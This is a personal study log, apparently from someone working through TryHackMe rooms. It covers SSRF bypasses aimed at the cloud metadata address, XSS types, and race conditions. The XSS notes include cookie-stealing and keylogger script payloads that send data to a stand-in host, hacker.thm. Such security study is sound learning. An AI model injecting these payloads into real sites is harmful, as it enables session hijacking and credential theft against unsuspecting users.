Day planner

• CTF || Wargame
• TryHackMe || HTB || 보안 기사 공부 ✅ 2025-07-18
• 보안 뉴스 || 보안 논문 읽기
• Algorithm || Python

Daily Log

공부 기록

TryHackMe

• Intro to SSRF
  SSRF → Regular SSRF + Blind SSRF
  - &x= : the payload ending in ‘&x=’ being used to stop the remaining path from being appended to the end of the attacker’s URL and instead turns it into a parameter (?x=) on the query string.
  - Potenial SSRF vulnerabilities
  1. FULL URL is used in a parameter
  2. A hidden field in a form
  3. a partial URL such as just the hostname (https://website.thm/form?server=api)
  4. perhaps only the path of the URL
  - Blind SSRF → no ouput is reflected back to attacker
  - need to use an external HTTP logging tool to monitor requests such as requestbin.com
  - deny list → 우회해보기
  - clound environment에서의 sensitive data가 포함된 url = 169.254.169.254
  - allow list → 허용된 url 이용해서 우회 || 허용된 url이 포함되도록 사이트 만들어서 공격
  - open redirect → allow list를 이용하면서 redirected 되도록 시도.
  - https://website.thm/link?url=https://tryhackme.com
  - trick : x/../

• XSS(Cross-Site Scripting)
  - Session Stealing : <script>fetch('https://hacker.thm/steal?cookie='+btoa(document.cookie));</script>
  - Key Logger : <script>document.onkeypress = function(e) { fetch('https://hacker.thm/log?key=' + bota(e.key) );}</script>
  - Reflected XSS
  - Parameters in the URL Query String
  - URL File Path
  - Sometimes HTTP Headers
  - Stored XSS
  - Comments on a blog
  - User profile information
  - Website Listings
  - DOM(Document Object Model) Based XSS
  Justice : where the JS execution happens directly in the browser without any new pages being loaded or data submitted to backend code. Execution occurs swhen the website JS code acts on input or user interaction.
  - window.location.x, eval()
  - Blind XSS
  - Tool : XSS Hunter Express

• Race Conditions
  - introduction
  - multi-threading
  - race conditions